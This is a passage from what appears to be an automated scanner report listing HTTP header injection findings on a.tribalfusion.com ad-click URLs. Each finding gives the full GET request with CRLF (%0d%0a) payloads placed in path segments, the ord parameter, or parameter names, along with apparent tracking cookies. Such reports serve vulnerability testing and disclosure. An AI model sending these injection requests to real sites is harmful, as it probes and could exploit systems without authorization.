GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/a51c3%0d%0a7eebecdec02 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 3 is copied into the Location response header. The payload 591e6%0d%0a985b0b0017d was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/591e6%0d%0a985b0b0017d/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 4 is copied into the Location response header. The payload 83775%0d%0a107c0b40884 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/83775%0d%0a107c0b40884/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 5 is copied into the Location response header. The payload f3296%0d%0a30ce56375d6 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/f3296%0d%0a30ce56375d6/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 6 is copied into the Location response header. The payload e3982%0d%0a98884cd2344 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/e3982%0d%0a98884cd2344/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 7 is copied into the Location response header. The payload a276f%0d%0a361444f8735 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.
Request
GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/a276f%0d%0a361444f8735/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 8 is copied into the Location response header. The payload 83f7f%0d%0a20b0303aa8 was submitted in the REST URL parameter 8. This caused a response containing an injected HTTP header.
Request
GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/83f7f%0d%0a20b0303aa8/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 9 is copied into the Location response header. The payload 90f5c%0d%0a969ec85c814 was submitted in the REST URL parameter 9. This caused a response containing an injected HTTP header.
Request
GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/90f5c%0d%0a969ec85c814/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of the http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr request parameter is copied into the Location response header. The payload 2b368%0d%0ae152459b88d was submitted in the http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr=2b368%0d%0ae152459b88d HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
3.20. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload b66f4%0d%0af5f710e997 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?b66f4%0d%0af5f710e997=1 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
3.21. http://a.tribalfusion.com/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 8d45c%0d%0a20e1c69dbef was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/?8d45c%0d%0a20e1c69dbef=1 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of the ord request parameter is copied into the Location response header. The payload ac0a8%0d%0a8ed1987295d was submitted in the ord parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/;ord=ac0a8%0d%0a8ed1987295d HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
3.23. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 2bc38%0d%0a32afce6163b was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/?2bc38%0d%0a32afce6163b=1 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
The value of the ord request parameter is copied into the Location response header. The payload d8e25%0d%0abe3ec6901dd was submitted in the ord parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/;ord=d8e25%0d%0abe3ec6901dd HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
The value of REST URL parameter 3 is copied into the Location response header. The payload ebaaf%0d%0a08b66f30576 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
